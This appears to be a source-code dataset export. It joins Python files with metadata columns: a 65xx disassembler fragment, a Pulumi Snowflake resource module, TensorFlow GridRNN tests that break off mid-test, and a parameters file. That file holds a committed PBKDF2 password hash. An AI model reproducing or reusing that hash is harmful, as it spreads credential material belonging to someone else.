dp_address, '$' + self.byteFmt % dp_address)
disasm += ' (%s),Y' % address_or_label
length = 2
elif addressing == 'dly':
dp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
dp_address, '$' + self.byteFmt % dp_address)
disasm += ' [%s],Y' % address_or_label
length = 2
elif addressing == 'pcr':
opv = self._mpu.ByteAt(pc + 1)
targ = pc + 2
if opv & (1 << (self.byteWidth - 1)):
targ -= (opv ^ self.byteMask) + 1
else:
targ += opv
targ &= self.addrMask
address_or_label = self._address_parser.label_for(
targ, '$' + self.addrFmt % targ)
disasm += ' ' + address_or_label
length = 2
elif addressing == 'prl':
# *** CHECK ***
opv = self._mpu.WordAt(pc + 1)
targ = pc + 3
if opv & (1 << (self.byteWidth - 1)):
targ -= (opv ^ self.byteMask) + 1
else:
targ += opv
targ &= self.addrMask
address_or_label = self._address_parser.label_for(
targ, '$' + self.addrFmt % targ)
disasm += ' ' + address_or_label
length = 3
elif addressing == 'ska' or addressing == 'spc':
data = self._mpu.WordAt(pc + 1)
address_or_label = self._address_parser.label_for(
data, '$' + self.addrFmt % data)
disasm += ' ' + address_or_label
length = 3
elif addressing == 'ski':
byte = self._mpu.ByteAt(pc + 1)
# *** TODO: choose between these according to ca65 syntax ***
# disasm += ' #$' + self.byteFmt % byte
disasm += ' $' + self.byteFmt % byte
length = 2
elif addressing == 'stk':
length = 1
elif addressing == 'str':
sp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
sp_address, '$' + self.byteFmt % sp_address)
disasm += ' %s,S' % address_or_label
length = 2
elif addressing == 'siy':
sp_address = self._mpu.ByteAt(pc + 1)
address_or_label = self._address_parser.label_for(
sp_address, '$' + self.byteFmt % sp_address)
disasm += ' (%s,S),Y' % address_or_label
length = 2
else:
msg = "Addressing mode: %r" % addressing
raise NotImplementedError(msg)
return (length, disasm)
| 37.162712
| 83
| 0.512816
| 1,170
| 10,963
| 4.533333
| 0.108547
| 0.10181
| 0.158371
| 0.13273
| 0.808069
| 0.79902
| 0.769985
| 0.757353
| 0.729638
| 0.729638
| 0
| 0.013523
| 0.372708
| 10,963
| 294
| 84
| 37.289116
| 0.757743
| 0.03302
| 0
| 0.705882
| 0
| 0
| 0.030274
| 0
| 0
| 0
| 0
| 0.003401
| 0
| 1
| 0.008403
| false
| 0
| 0.004202
| 0
| 0.021008
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83655b40f56131aad8e6bb4be75ee99d21c38071
| 92
|
py
|
Python
|
parameters_8000.py
|
ectom/CMPS183
|
c603d7ad95cfa92ee32c62fe35ad07f0c0828772
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
ectom/CMPS183
|
c603d7ad95cfa92ee32c62fe35ad07f0c0828772
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
ectom/CMPS183
|
c603d7ad95cfa92ee32c62fe35ad07f0c0828772
|
[
"BSD-3-Clause"
] | null | null | null |
password="pbkdf2(1000,20,sha512)$80cc21effc349862$0cc98f172b0664e5c8f64e43a1eb236d5e7ff5bc"
| 46
| 91
| 0.891304
| 7
| 92
| 11.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.472527
| 0.01087
| 92
| 1
| 92
| 92
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0.869565
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
55ca1dd8849df107145148894a8334a427c53a43
| 22,629
|
py
|
Python
|
sdk/python/pulumi_snowflake/materialized_view.py
|
Hacker0x01/pulumi-snowflake
|
f6ebcf2c3f73b103a7c2001fae231998ce1323b2
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2021-07-01T17:03:33.000Z
|
2022-03-01T19:29:04.000Z
|
sdk/python/pulumi_snowflake/materialized_view.py
|
Hacker0x01/pulumi-snowflake
|
f6ebcf2c3f73b103a7c2001fae231998ce1323b2
|
[
"ECL-2.0",
"Apache-2.0"
] | 102
|
2021-07-14T13:12:58.000Z
|
2022-03-31T18:34:04.000Z
|
sdk/python/pulumi_snowflake/materialized_view.py
|
Hacker0x01/pulumi-snowflake
|
f6ebcf2c3f73b103a7c2001fae231998ce1323b2
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2022-03-25T07:24:45.000Z
|
2022-03-25T07:24:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MaterializedViewArgs', 'MaterializedView']
@pulumi.input_type
class MaterializedViewArgs:
def __init__(__self__, *,
database: pulumi.Input[str],
schema: pulumi.Input[str],
statement: pulumi.Input[str],
warehouse: pulumi.Input[str],
comment: Optional[pulumi.Input[str]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
or_replace: Optional[pulumi.Input[bool]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]]] = None):
"""
The set of arguments for constructing a MaterializedView resource.
:param pulumi.Input[str] database: The database in which to create the view. Don't use the | character.
:param pulumi.Input[str] schema: The schema in which to create the view. Don't use the | character.
:param pulumi.Input[str] statement: Specifies the query used to create the view.
:param pulumi.Input[str] warehouse: The warehouse name.
:param pulumi.Input[str] comment: Specifies a comment for the view.
:param pulumi.Input[bool] is_secure: Specifies that the view is secure.
:param pulumi.Input[str] name: Specifies the identifier for the view; must be unique for the schema in which the view is created.
:param pulumi.Input[bool] or_replace: Overwrites the View if it exists.
:param pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]] tags: Definitions of a tag to associate with the resource.
"""
pulumi.set(__self__, "database", database)
pulumi.set(__self__, "schema", schema)
pulumi.set(__self__, "statement", statement)
pulumi.set(__self__, "warehouse", warehouse)
if comment is not None:
pulumi.set(__self__, "comment", comment)
if is_secure is not None:
pulumi.set(__self__, "is_secure", is_secure)
if name is not None:
pulumi.set(__self__, "name", name)
if or_replace is not None:
pulumi.set(__self__, "or_replace", or_replace)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def database(self) -> pulumi.Input[str]:
"""
The database in which to create the view. Don't use the | character.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: pulumi.Input[str]):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def schema(self) -> pulumi.Input[str]:
"""
The schema in which to create the view. Don't use the | character.
"""
return pulumi.get(self, "schema")
@schema.setter
def schema(self, value: pulumi.Input[str]):
pulumi.set(self, "schema", value)
@property
@pulumi.getter
def statement(self) -> pulumi.Input[str]:
"""
Specifies the query used to create the view.
"""
return pulumi.get(self, "statement")
@statement.setter
def statement(self, value: pulumi.Input[str]):
pulumi.set(self, "statement", value)
@property
@pulumi.getter
def warehouse(self) -> pulumi.Input[str]:
"""
The warehouse name.
"""
return pulumi.get(self, "warehouse")
@warehouse.setter
def warehouse(self, value: pulumi.Input[str]):
pulumi.set(self, "warehouse", value)
@property
@pulumi.getter
def comment(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a comment for the view.
"""
return pulumi.get(self, "comment")
@comment.setter
def comment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "comment", value)
@property
@pulumi.getter(name="isSecure")
def is_secure(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies that the view is secure.
"""
return pulumi.get(self, "is_secure")
@is_secure.setter
def is_secure(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_secure", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the identifier for the view; must be unique for the schema in which the view is created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="orReplace")
def or_replace(self) -> Optional[pulumi.Input[bool]]:
"""
Overwrites the View if it exists.
"""
return pulumi.get(self, "or_replace")
@or_replace.setter
def or_replace(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "or_replace", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]]]:
"""
Definitions of a tag to associate with the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _MaterializedViewState:
def __init__(__self__, *,
comment: Optional[pulumi.Input[str]] = None,
database: Optional[pulumi.Input[str]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
or_replace: Optional[pulumi.Input[bool]] = None,
schema: Optional[pulumi.Input[str]] = None,
statement: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]]] = None,
warehouse: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering MaterializedView resources.
:param pulumi.Input[str] comment: Specifies a comment for the view.
:param pulumi.Input[str] database: The database in which to create the view. Don't use the | character.
:param pulumi.Input[bool] is_secure: Specifies that the view is secure.
:param pulumi.Input[str] name: Specifies the identifier for the view; must be unique for the schema in which the view is created.
:param pulumi.Input[bool] or_replace: Overwrites the View if it exists.
:param pulumi.Input[str] schema: The schema in which to create the view. Don't use the | character.
:param pulumi.Input[str] statement: Specifies the query used to create the view.
:param pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]] tags: Definitions of a tag to associate with the resource.
:param pulumi.Input[str] warehouse: The warehouse name.
"""
if comment is not None:
pulumi.set(__self__, "comment", comment)
if database is not None:
pulumi.set(__self__, "database", database)
if is_secure is not None:
pulumi.set(__self__, "is_secure", is_secure)
if name is not None:
pulumi.set(__self__, "name", name)
if or_replace is not None:
pulumi.set(__self__, "or_replace", or_replace)
if schema is not None:
pulumi.set(__self__, "schema", schema)
if statement is not None:
pulumi.set(__self__, "statement", statement)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if warehouse is not None:
pulumi.set(__self__, "warehouse", warehouse)
@property
@pulumi.getter
def comment(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a comment for the view.
"""
return pulumi.get(self, "comment")
@comment.setter
def comment(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "comment", value)
@property
@pulumi.getter
def database(self) -> Optional[pulumi.Input[str]]:
"""
The database in which to create the view. Don't use the | character.
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database", value)
@property
@pulumi.getter(name="isSecure")
def is_secure(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies that the view is secure.
"""
return pulumi.get(self, "is_secure")
@is_secure.setter
def is_secure(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "is_secure", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the identifier for the view; must be unique for the schema in which the view is created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="orReplace")
def or_replace(self) -> Optional[pulumi.Input[bool]]:
"""
Overwrites the View if it exists.
"""
return pulumi.get(self, "or_replace")
@or_replace.setter
def or_replace(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "or_replace", value)
@property
@pulumi.getter
def schema(self) -> Optional[pulumi.Input[str]]:
"""
The schema in which to create the view. Don't use the | character.
"""
return pulumi.get(self, "schema")
@schema.setter
def schema(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "schema", value)
@property
@pulumi.getter
def statement(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the query used to create the view.
"""
return pulumi.get(self, "statement")
@statement.setter
def statement(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "statement", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]]]:
"""
Definitions of a tag to associate with the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def warehouse(self) -> Optional[pulumi.Input[str]]:
"""
The warehouse name.
"""
return pulumi.get(self, "warehouse")
@warehouse.setter
def warehouse(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "warehouse", value)
class MaterializedView(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
comment: Optional[pulumi.Input[str]] = None,
database: Optional[pulumi.Input[str]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
or_replace: Optional[pulumi.Input[bool]] = None,
schema: Optional[pulumi.Input[str]] = None,
statement: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MaterializedViewTagArgs']]]]] = None,
warehouse: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
## Example Usage
```python
import pulumi
import pulumi_snowflake as snowflake
view = snowflake.MaterializedView("view",
database="db",
schema="schema",
warehouse="warehouse",
comment="comment",
statement="select * from foo;\n",
or_replace=False,
is_secure=False)
```
## Import
# format is database name | schema name | view name
```sh
$ pulumi import snowflake:index/materializedView:MaterializedView example 'dbName|schemaName|viewName'
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] comment: Specifies a comment for the view.
:param pulumi.Input[str] database: The database in which to create the view. Don't use the | character.
:param pulumi.Input[bool] is_secure: Specifies that the view is secure.
:param pulumi.Input[str] name: Specifies the identifier for the view; must be unique for the schema in which the view is created.
:param pulumi.Input[bool] or_replace: Overwrites the View if it exists.
:param pulumi.Input[str] schema: The schema in which to create the view. Don't use the | character.
:param pulumi.Input[str] statement: Specifies the query used to create the view.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MaterializedViewTagArgs']]]] tags: Definitions of a tag to associate with the resource.
:param pulumi.Input[str] warehouse: The warehouse name.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MaterializedViewArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Example Usage
```python
import pulumi
import pulumi_snowflake as snowflake
view = snowflake.MaterializedView("view",
database="db",
schema="schema",
warehouse="warehouse",
comment="comment",
statement="select * from foo;\n",
or_replace=False,
is_secure=False)
```
## Import
# format is database name | schema name | view name
```sh
$ pulumi import snowflake:index/materializedView:MaterializedView example 'dbName|schemaName|viewName'
```
:param str resource_name: The name of the resource.
:param MaterializedViewArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MaterializedViewArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
comment: Optional[pulumi.Input[str]] = None,
database: Optional[pulumi.Input[str]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
or_replace: Optional[pulumi.Input[bool]] = None,
schema: Optional[pulumi.Input[str]] = None,
statement: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MaterializedViewTagArgs']]]]] = None,
warehouse: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MaterializedViewArgs.__new__(MaterializedViewArgs)
__props__.__dict__["comment"] = comment
if database is None and not opts.urn:
raise TypeError("Missing required property 'database'")
__props__.__dict__["database"] = database
__props__.__dict__["is_secure"] = is_secure
__props__.__dict__["name"] = name
__props__.__dict__["or_replace"] = or_replace
if schema is None and not opts.urn:
raise TypeError("Missing required property 'schema'")
__props__.__dict__["schema"] = schema
if statement is None and not opts.urn:
raise TypeError("Missing required property 'statement'")
__props__.__dict__["statement"] = statement
__props__.__dict__["tags"] = tags
if warehouse is None and not opts.urn:
raise TypeError("Missing required property 'warehouse'")
__props__.__dict__["warehouse"] = warehouse
super(MaterializedView, __self__).__init__(
'snowflake:index/materializedView:MaterializedView',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
comment: Optional[pulumi.Input[str]] = None,
database: Optional[pulumi.Input[str]] = None,
is_secure: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
or_replace: Optional[pulumi.Input[bool]] = None,
schema: Optional[pulumi.Input[str]] = None,
statement: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MaterializedViewTagArgs']]]]] = None,
warehouse: Optional[pulumi.Input[str]] = None) -> 'MaterializedView':
"""
Get an existing MaterializedView resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] comment: Specifies a comment for the view.
:param pulumi.Input[str] database: The database in which to create the view. Don't use the | character.
:param pulumi.Input[bool] is_secure: Specifies that the view is secure.
:param pulumi.Input[str] name: Specifies the identifier for the view; must be unique for the schema in which the view is created.
:param pulumi.Input[bool] or_replace: Overwrites the View if it exists.
:param pulumi.Input[str] schema: The schema in which to create the view. Don't use the | character.
:param pulumi.Input[str] statement: Specifies the query used to create the view.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MaterializedViewTagArgs']]]] tags: Definitions of a tag to associate with the resource.
:param pulumi.Input[str] warehouse: The warehouse name.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MaterializedViewState.__new__(_MaterializedViewState)
__props__.__dict__["comment"] = comment
__props__.__dict__["database"] = database
__props__.__dict__["is_secure"] = is_secure
__props__.__dict__["name"] = name
__props__.__dict__["or_replace"] = or_replace
__props__.__dict__["schema"] = schema
__props__.__dict__["statement"] = statement
__props__.__dict__["tags"] = tags
__props__.__dict__["warehouse"] = warehouse
return MaterializedView(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def comment(self) -> pulumi.Output[Optional[str]]:
"""
Specifies a comment for the view.
"""
return pulumi.get(self, "comment")
@property
@pulumi.getter
def database(self) -> pulumi.Output[str]:
"""
The database in which to create the view. Don't use the | character.
"""
return pulumi.get(self, "database")
@property
@pulumi.getter(name="isSecure")
def is_secure(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies that the view is secure.
"""
return pulumi.get(self, "is_secure")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the identifier for the view; must be unique for the schema in which the view is created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="orReplace")
def or_replace(self) -> pulumi.Output[Optional[bool]]:
"""
Overwrites the View if it exists.
"""
return pulumi.get(self, "or_replace")
@property
@pulumi.getter
def schema(self) -> pulumi.Output[str]:
"""
The schema in which to create the view. Don't use the | character.
"""
return pulumi.get(self, "schema")
@property
@pulumi.getter
def statement(self) -> pulumi.Output[str]:
"""
Specifies the query used to create the view.
"""
return pulumi.get(self, "statement")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence['outputs.MaterializedViewTag']]]:
"""
Definitions of a tag to associate with the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def warehouse(self) -> pulumi.Output[str]:
"""
The warehouse name.
"""
return pulumi.get(self, "warehouse")
| 39.423345
| 155
| 0.620973
| 2,597
| 22,629
| 5.245283
| 0.066615
| 0.108207
| 0.08222
| 0.067831
| 0.852665
| 0.817942
| 0.799883
| 0.772427
| 0.75356
| 0.738731
| 0
| 0.000061
| 0.269698
| 22,629
| 573
| 156
| 39.492147
| 0.824216
| 0.310089
| 0
| 0.734568
| 1
| 0
| 0.087404
| 0.01931
| 0
| 0
| 0
| 0
| 0
| 1
| 0.160494
| false
| 0.003086
| 0.021605
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
55ca41d1fc28484f631b583b38c98fb53b7752fd
| 22
|
py
|
Python
|
fundamentos/teste.py
|
C3As/COD3R-Curso-Python
|
13e778108388e290da433db991838c307750a337
|
[
"MIT"
] | null | null | null |
fundamentos/teste.py
|
C3As/COD3R-Curso-Python
|
13e778108388e290da433db991838c307750a337
|
[
"MIT"
] | null | null | null |
fundamentos/teste.py
|
C3As/COD3R-Curso-Python
|
13e778108388e290da433db991838c307750a337
|
[
"MIT"
] | null | null | null |
#%%
2 * 3
10 / 3
# %%
| 4.4
| 6
| 0.227273
| 4
| 22
| 1.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.384615
| 0.409091
| 22
| 4
| 7
| 5.5
| 0
| 0.227273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
363a3c9b4a59eb8f769b16a11a3ade0643358c64
| 30,186
|
py
|
Python
|
tensorflow/contrib/grid_rnn/python/kernel_tests/grid_rnn_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 848
|
2019-12-03T00:16:17.000Z
|
2022-03-31T22:53:17.000Z
|
tensorflow/contrib/grid_rnn/python/kernel_tests/grid_rnn_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 656
|
2019-12-03T00:48:46.000Z
|
2022-03-31T18:41:54.000Z
|
tensorflow/contrib/grid_rnn/python/kernel_tests/grid_rnn_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 506
|
2019-12-03T00:46:26.000Z
|
2022-03-30T10:34:56.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for GridRNN cells."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.grid_rnn.python.ops import grid_rnn_cell
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class GridRNNCellTest(test.TestCase):
def testGrid2BasicLSTMCell(self):
with self.test_session(use_gpu=False) as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.2)) as root_scope:
x = array_ops.zeros([1, 3])
m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),
(array_ops.zeros([1, 2]), array_ops.zeros([1, 2])))
cell = grid_rnn_cell.Grid2BasicLSTMCell(2)
self.assertEqual(cell.state_size, ((2, 2), (2, 2)))
g, s = cell(x, m)
self.assertEqual(g[0].get_shape(), (1, 2))
self.assertEqual(s[0].c.get_shape(), (1, 2))
self.assertEqual(s[0].h.get_shape(), (1, 2))
self.assertEqual(s[1].c.get_shape(), (1, 2))
self.assertEqual(s[1].h.get_shape(), (1, 2))
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run([g, s], {
x:
np.array([[1., 1., 1.]]),
m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),
(np.array([[0.5, 0.6]]), np.array([[0.7, 0.8]])))
})
self.assertEqual(res_g[0].shape, (1, 2))
self.assertEqual(res_s[0].c.shape, (1, 2))
self.assertEqual(res_s[0].h.shape, (1, 2))
self.assertEqual(res_s[1].c.shape, (1, 2))
self.assertEqual(res_s[1].h.shape, (1, 2))
self.assertAllClose(res_g, ([[0.36617181, 0.36617181]],))
self.assertAllClose(
res_s, (([[0.71053141, 0.71053141]], [[0.36617181, 0.36617181]]),
([[0.72320831, 0.80555487]], [[0.39102408, 0.42150158]])))
# emulate a loop through the input sequence,
# where we call cell() multiple times
root_scope.reuse_variables()
g2, s2 = cell(x, m)
self.assertEqual(g2[0].get_shape(), (1, 2))
self.assertEqual(s2[0].c.get_shape(), (1, 2))
self.assertEqual(s2[0].h.get_shape(), (1, 2))
self.assertEqual(s2[1].c.get_shape(), (1, 2))
self.assertEqual(s2[1].h.get_shape(), (1, 2))
res_g2, res_s2 = sess.run([g2, s2],
{x: np.array([[2., 2., 2.]]),
m: res_s})
self.assertEqual(res_g2[0].shape, (1, 2))
self.assertEqual(res_s2[0].c.shape, (1, 2))
self.assertEqual(res_s2[0].h.shape, (1, 2))
self.assertEqual(res_s2[1].c.shape, (1, 2))
self.assertEqual(res_s2[1].h.shape, (1, 2))
self.assertAllClose(res_g2[0], [[0.58847463, 0.58847463]])
self.assertAllClose(
res_s2, (([[1.40469193, 1.40469193]], [[0.58847463, 0.58847463]]),
([[0.97726452, 1.04626071]], [[0.4927212, 0.51137757]])))
def testGrid2BasicLSTMCellTied(self):
with self.test_session(use_gpu=False) as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.2)):
x = array_ops.zeros([1, 3])
m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),
(array_ops.zeros([1, 2]), array_ops.zeros([1, 2])))
cell = grid_rnn_cell.Grid2BasicLSTMCell(2, tied=True)
self.assertEqual(cell.state_size, ((2, 2), (2, 2)))
g, s = cell(x, m)
self.assertEqual(g[0].get_shape(), (1, 2))
self.assertEqual(s[0].c.get_shape(), (1, 2))
self.assertEqual(s[0].h.get_shape(), (1, 2))
self.assertEqual(s[1].c.get_shape(), (1, 2))
self.assertEqual(s[1].h.get_shape(), (1, 2))
sess.run([variables.global_variables_initializer()])
res_g, res_s = sess.run([g, s], {
x:
np.array([[1., 1., 1.]]),
m: ((np.array([[0.1, 0.2]]), np.array([[0.3, 0.4]])),
(np.array([[0.5, 0.6]]), np.array([[0.7, 0.8]])))
})
self.assertEqual(res_g[0].shape, (1, 2))
self.assertEqual(res_s[0].c.shape, (1, 2))
self.assertEqual(res_s[0].h.shape, (1, 2))
self.assertEqual(res_s[1].c.shape, (1, 2))
self.assertEqual(res_s[1].h.shape, (1, 2))
self.assertAllClose(res_g[0], [[0.36617181, 0.36617181]])
self.assertAllClose(
res_s, (([[0.71053141, 0.71053141]], [[0.36617181, 0.36617181]]),
([[0.72320831, 0.80555487]], [[0.39102408, 0.42150158]])))
res_g, res_s = sess.run([g, s], {x: np.array([[1., 1., 1.]]), m: res_s})
self.assertEqual(res_g[0].shape, (1, 2))
self.assertAllClose(res_g[0], [[0.36703536, 0.36703536]])
self.assertAllClose(
res_s, (([[0.71200621, 0.71200621]], [[0.36703536, 0.36703536]]),
([[0.80941606, 0.87550586]], [[0.40108523, 0.42199609]])))
def testGrid2BasicLSTMCellWithRelu(self):
with self.test_session(use_gpu=False) as sess:
with variable_scope.variable_scope(
'root', initializer=init_ops.constant_initializer(0.2)):
x = array_ops.zeros([1, 3])
m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),)
cell = grid_rnn_cell.Grid2BasicLSTMCell(
2, tied=False, non_recurrent_fn=nn_ops.relu)
self.assertEqual(cell.state_size, ((2, 2),))
g, s = cell(x, m)
self.assertEqual(g[0].get_shape(), (1, 2))
self.assertEqual(s[0].c.get_shape(), (1, 2))
